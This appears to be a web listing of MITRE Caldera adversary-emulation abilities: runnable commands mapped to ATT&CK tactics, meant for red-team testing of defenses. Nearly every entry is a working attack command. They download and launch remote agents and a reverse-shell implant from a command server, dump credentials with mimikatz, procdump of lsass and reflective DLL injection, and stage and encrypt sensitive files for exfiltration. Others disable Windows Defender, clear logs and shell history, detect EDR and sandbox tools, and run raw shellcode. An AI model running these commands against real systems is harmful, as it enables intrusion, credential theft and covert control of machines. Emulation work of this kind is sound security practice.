Caldera emulation abilities
211 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics
build-capabilities (1) · collection (16) · command-and-control (6) · credential-access (10) · defense-evasion (15) · detection (8) · discovery (67) · execution (9) · exfiltration (13) · hunt (4) · impact (8) · lateral-movement (10) · persistence (3) · privilege-escalation (8) · response (14) · setup (10) · technical-information-gathering (1) · training (6) · verification (2)
Abilities
50 shown of 211
Load Metasploit Abilities
[{"platform": "darwin,linux", "executor": "sh", "command": "msfconsole -r msf_extract.rb #{app.contact.http} #{app.api_key.red}\n"}]
Advanced File Search and Stager
Highly configurable file finder and stager for Linux and Windows. Drops a payload file to the host to parse
arguments rather than running multiple commands for each fact (e.g., each file type). This ability allows for a safe
mode, only staging files found that have the appropriate file ending. The staging directory is configurable but
defaults to the current user's Recycle Bin (Windows) and /tmp (Linux). Payload files include default values for all
parameters (matching the base fact source - File Search and Stage). Options for searches: file extensions (include,
exclude [windows]), directories (include, exclude), accessed date cutoff, modified date cutoff, sensitive search
strings in files or titles.
[{"platform": "windows", "executor": "psh", "command": ".\\file_search.ps1 -Extensions '#{windows.included.extensions}' -ExcludedExtensions '#{windows.excluded.extensions}'\n -Directories '#{windows.included.directories}' -ExcludedDirectories '#{windows.excluded.directories}'\n -AccessedCutoff #{file.last.accessed} -ModifiedCutoff #{file.last.modified}\n -SearchStrings '#{file.sensitive.content}' -StagingDirectory '#{windows.staging.location}'\n -SafeMode $#{safe.mode.enabled} -PseudoExtension #{pseudo.data.identifier}\n"}, {"platform": "linux", "executor": "sh", "command": "chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}'\n --directories '#{linux.included.directories}' --exclude-dir '#{linux.excluded.directories}'\n --accessed '#{file.last.accessed}' --modified '#{file.last.modified}' --search-strings '#{file.sensitive.content}'\n --staging-directory '#{linux.staging.location}' --safe-mode '#{safe.mode.enabled}' --pseudo-ext '#{pseudo.data.identifier}'\n"}]
Compress staged directory (Password Protected)
This ability packages staged files into a password-protected archive. Note: requires 7-Zip on Windows and GPG version 2.1+ on Linux.
[{"platform": "linux", "executor": "sh", "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n"}, {"platform": "windows", "executor": "psh", "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n"}]
Copy Clipboard
Copy the contents of the clipboard and print them
[{"platform": "darwin", "executor": "sh", "command": "pbpaste\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-Clipboard -raw\n"}, {"platform": "linux", "executor": "sh", "command": "xclip -o\n"}]
Create staging directory
Create a directory for exfil staging
[{"platform": "darwin", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"}, {"platform": "linux", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n"}]
Find Git Repositories
This ability will locate directories that are cloned Git repositories.
[{"platform": "linux", "executor": "sh", "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n"}]
Find IP addresses
Grep for IP addresses in the user's home directory
[{"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n"}]
Find company emails
Grep for all email addresses belonging to the given target company
[{"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n"}]
Find files
Locate files deemed sensitive
[{"platform": "darwin", "executor": "sh", "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n"}, {"platform": "linux", "executor": "sh", "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"}]
Parse SSH config
List the SSH hosts defined in the user's SSH config file
[{"platform": "darwin", "executor": "sh", "command": "pip install stormssh && storm list\n"}, {"platform": "linux", "executor": "sh", "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n"}]
PowerShell information gathering
System Information Gathering Script
[{"platform": "windows", "executor": "psh,pwsh", "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";"}]
Screen Capture
Capture the contents of the screen
[{"platform": "darwin", "executor": "sh", "command": "for i in {1..5}; do screencapture -t png screen-$i.png; echo \"$(cd \"$(dirname \"$1\")\"; pwd -P)/$(basename \"screen-$i.png\")\"; sleep 5; done;\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "$loadResult = [Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\");\nfunction screenshot([Drawing.Rectangle]$bounds, $path) {\n $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height;\n $graphics = [Drawing.Graphics]::FromImage($bmp);\n $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size);\n $bmp.Save($path);\n $graphics.Dispose();\n $bmp.Dispose();\n}\nif ($loadResult) {\n $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1000, 900);\n $dest = \"$HOME\\Desktop\\screenshot.png\";\n screenshot $bounds $dest;\n if (Test-Path -Path $dest) {\n $dest;\n exit 0;\n };\n};\nexit 1;\n"}]
Stage sensitive files
Copy files to the staging directory
[{"platform": "darwin", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "linux", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "windows", "executor": "psh", "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "windows", "executor": "cmd", "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}]
SysInternals PSTool Process Discovery
Process discovery via the SysInternals PSTools suite (pslist)
[{"platform": "windows", "executor": "psh,pwsh", "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n"}]
WMIC Process Enumeration
Capture each process's executable path, name, PID and parent PID, writing the result to disk
[{"platform": "windows", "executor": "psh", "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n"}]
cURL socket address
See the raw content of a socket
[{"platform": "darwin", "executor": "sh", "command": "curl #{remote.host.socket}\n"}, {"platform": "linux", "executor": "sh", "command": "curl #{remote.host.socket}\n"}]
cmd.exe information gathering
User, privilege and network connection enumeration via cmd.exe
[{"platform": "windows", "executor": "psh", "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;"}]
Elasticat
A blue-team Python agent that executes Elasticsearch queries.
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:elasticat.py\" -H \"platform:darwin\" $server/file/download > elasticat.py;\npip install requests;\npython elasticat.py --server=$server --es-host=\"http://127.0.0.1:9200\" --group=blue --minutes-since=60\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:elasticat.py\" -H \"platform:linux\" $server/file/download > elasticat.py;\npip install requests;\npython elasticat.py --server=$server --es-host=\"http://127.0.0.1:9200\" --group=blue --minutes-since=60\n"}]
Install PSTools
Download PSTools and install it by unzipping the archive
[{"platform": "windows", "executor": "psh", "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n"}]
Install PowerShell Core 6
Download and install PowerShell Core 6, then start a new process under it
[{"platform": "windows", "executor": "psh", "command": "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n"}]
Manx
A reverse-shell agent which communicates via the TCP contact
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\nsocket=\"#{app.contact.tcp}\";\ncontact=\"tcp\";\ncurl -s -X POST -H \"file:manx.go\" -H \"platform:darwin\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -http $server -socket $socket -contact $contact -v\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\nsocket=\"#{app.contact.tcp}\";\ncontact=\"tcp\";\ncurl -s -X POST -H \"file:manx.go\" -H \"platform:linux\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -http $server -socket $socket -contact $contact -v\n"}, {"platform": "windows", "executor": "psh", "command": "if ($host.Version.Major -ge 3){$ErrAction= \"ignore\"}else{$ErrAction= \"SilentlyContinue\"};\n$server=\"#{app.contact.http}\";\n$socket=\"#{app.contact.tcp}\";\n$contact=\"tcp\";\n$url=\"$server/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"manx.go\");\n$data=$wc.DownloadData($url);\nGet-Process | ? {$_.Path -like \"C:\\Users\\Public\\#{agents.implant_name}.exe\"} | stop-process -f -ea $ErrAction;\nrm -force \"C:\\Users\\Public\\#{agents.implant_name}.exe\" -ea $ErrAction;\n([io.file]::WriteAllBytes(\"C:\\Users\\Public\\#{agents.implant_name}.exe\",$data)) | Out-Null;\nStart-Process -FilePath C:\\Users\\Public\\#{agents.implant_name}.exe -ArgumentList \"-socket $socket -http $server -contact $contact\" -WindowStyle hidden;\n"}]
Ragdoll
A Python agent which communicates via the HTML contact
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n"}]
Sandcat
Caldera's default agent, written in Go. Communicates through the HTTP(S) contact by default.
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:sandcat.go\" -H \"platform:darwin\" -H \"architecture:amd64\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -server $server -v\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:sandcat.go\" -H \"platform:linux\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -server $server -group red -v\n"}, {"platform": "windows", "executor": "psh", "command": "$server=\"#{app.contact.http}\";\n$url=\"$server/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$data=$wc.DownloadData($url);\nget-process | ? {$_.modules.filename -like \"C:\\Users\\Public\\#{agents.implant_name}.exe\"} | stop-process -f;\nrm -force \"C:\\Users\\Public\\#{agents.implant_name}.exe\" -ea ignore;\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\#{agents.implant_name}.exe\",$data) | Out-Null;\nStart-Process -FilePath C:\\Users\\Public\\#{agents.implant_name}.exe -ArgumentList \"-server $server -group red\" -WindowStyle hidden;\n"}]
Credentials in Registry - HKCU
Search for possible credentials stored in the HKCU hive
[{"platform": "windows", "executor": "psh", "command": "reg query HKCU /f password /t REG_SZ /s\n"}]
Credentials in Registry - HKLM
Search for possible credentials stored in the HKLM Hive
[{"platform": "windows", "executor": "psh", "command": "reg query HKLM /f password /t REG_SZ /s\n"}]
Dump history
Get the contents of the bash history
[{"platform": "darwin", "executor": "sh", "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null"}, {"platform": "linux", "executor": "sh", "command": "cat ~/.bash_history"}]
Find private keys
Find private keys on the file system
[{"platform": "windows", "executor": "psh", "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n"}, {"platform": "windows", "executor": "cmd", "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n"}, {"platform": "darwin", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n"}, {"platform": "linux", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;"}]
Inject Cred dumper into process (Spookier)
Injects the credential dumper executable into an available process
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose"}]
Leverage Procdump for lsass memory
Dump lsass memory for later use with mimikatz
[{"platform": "windows", "executor": "psh", "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n"}]
MiniDumpWriteDump (Spooky)
Custom Go credential dumper using MiniDumpWriteDump
[{"platform": "windows", "executor": "psh", "command": ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n"}]
Powerkatz (Staged)
Use Invoke-Mimikatz
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n"}]
Run PowerKatz
Use PowerKatz to execute mimikatz and attempt to grab plaintext and/or hashed passwords
[{"platform": "windows", "executor": "psh", "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n"}]
Sniff network traffic
Perform a packet capture
[{"platform": "windows", "executor": "psh", "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "tcpdump -i en0 & sleep 5; kill $!\n"}]
defense-evasion
["darwin", "linux", "windows"]
T1497.003 · Virtualization/Sandbox Evasion: Time Based Evasion ↗
1-min sleep
Pause all operations to avoid making noise
[{"platform": "darwin", "executor": "sh", "command": "sleep 60"}, {"platform": "linux", "executor": "sh", "command": "sleep 60"}, {"platform": "windows", "executor": "psh", "command": "sleep 60"}]
defense-evasion
["darwin", "linux", "windows"]
T1070.003 · Indicator Removal on Host: Clear Command History ↗
Avoid logs
Stop terminal from logging history
[{"platform": "darwin", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "linux", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "windows", "executor": "psh", "command": "Clear-History;Clear"}]
Bypass ExecutionPolicy
Ensure the PowerShell ExecutionPolicy is set to Bypass
[{"platform": "windows", "executor": "psh", "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")"}]
Check Security Services
Check for security services. The security service list is based on the SUNBURST malware observed in the SolarWinds-related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).
[{"platform": "windows", "executor": "psh,pwsh", "command": "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n \"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n"}]
Check analysis environment processes
Check for analysis/sandbox environment processes. The process block list is based on the SUNBURST malware observed in the SolarWinds-related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).
[{"platform": "windows", "executor": "psh", "command": "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n \"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n \"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n "}]
Clear Logs
Clear Sysmon logs [intended to trigger CAR-2016-04-002]
[{"platform": "windows", "executor": "psh,pwsh", "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n"}]
defense-evasion
["windows", "darwin", "linux"]
T1070.004 · Indicator Removal on Host: File Deletion ↗
Deadman - Delete agent file
Deadman ability to delete agent file after termination.
[{"platform": "windows", "executor": "psh", "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n"}, {"platform": "linux", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;"}]
defense-evasion
["darwin", "linux", "windows"]
T1070.004 · Indicator Removal on Host: File Deletion ↗
Delete payload
Remove a downloaded payload file
[{"platform": "darwin", "executor": "sh", "command": ""}, {"platform": "linux", "executor": "sh", "command": ""}, {"platform": "windows", "executor": "psh,pwsh", "command": ""}]
Disable Windows Defender All
Disable all Windows Defender protection features
[{"platform": "windows", "executor": "psh", "command": "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n"}]
Disable Windows Defender Real-Time Protection
Disable Windows Defender Real-Time Protection
[{"platform": "windows", "executor": "psh", "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n"}]
Inject Sandcat into process
Injects the Sandcat DLL into an available process
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n"}]
Move Powershell & triage
Copy powershell.exe to a non-standard location and run triage commands from it
[{"platform": "windows", "executor": "psh", "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n"}]
Signed Binary Execution - Mavinject
Leverage Mavinject (signed binary) for DLL injection
[{"platform": "windows", "executor": "psh", "command": "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n"}]
Signed Binary Execution - odbcconf
Leverage odbcconf for DLL injection
[{"platform": "windows", "executor": "psh", "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n"}]
Spawn calculator (shellcode)
Start a new calculator process
[{"platform": "windows", "executor": "shellcode_amd64", "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3"}]
Acquire suspicious files
Get information from the AV about suspicious files
[{"platform": "windows", "executor": "psh", "command": "if (Test-Path C:\\Users\\Public\\malicious_files.txt -PathType Leaf) {\n $hashes = Get-Content C:\\Users\\Public\\malicious_files.txt -Raw;\n Remove-Item C:\\Users\\Public\\malicious_files.txt;\n $hashes;\n}\n"}]
Find atypical open ports
Compare listening ports against a known baseline and report those not on it
[{"platform": "windows", "executor": "psh, pwsh", "command": "function getFullList($portList){\n $final = @();\n foreach ($p in $portList) {\n if ($p -like \"*-*\") {\n $minmax = $p.Split(\"-\");\n for ($i = ($minmax[0] -as [int]); $i -lt ($minmax[1] -as [int]); $i++) {\n $final += ($i -as [string]);\n };\n } else {\n $final += $p;\n };\n };\n return $final;\n};\n$basePorts = @(\"135\",\"139\",\"389\",\"445\",\"636\",\"1000-5000\",\"9389\",\"49152-65535\");\n$allPorts = getFullList $basePorts;\n$pidToPort = @();\nforeach ($port in (Get-NetTCPConnection -RemoteAddress 0.0.0.0 -state Listen)){\n if ($allPorts -notcontains $port.LocalPort){\n $pidToPort += , @{pid=$port.OwningProcess;port=$port.LocalPort};\n }\n};\n$pidToPort | ConvertTo-Json;\n"}]
Showing 1-50 of 211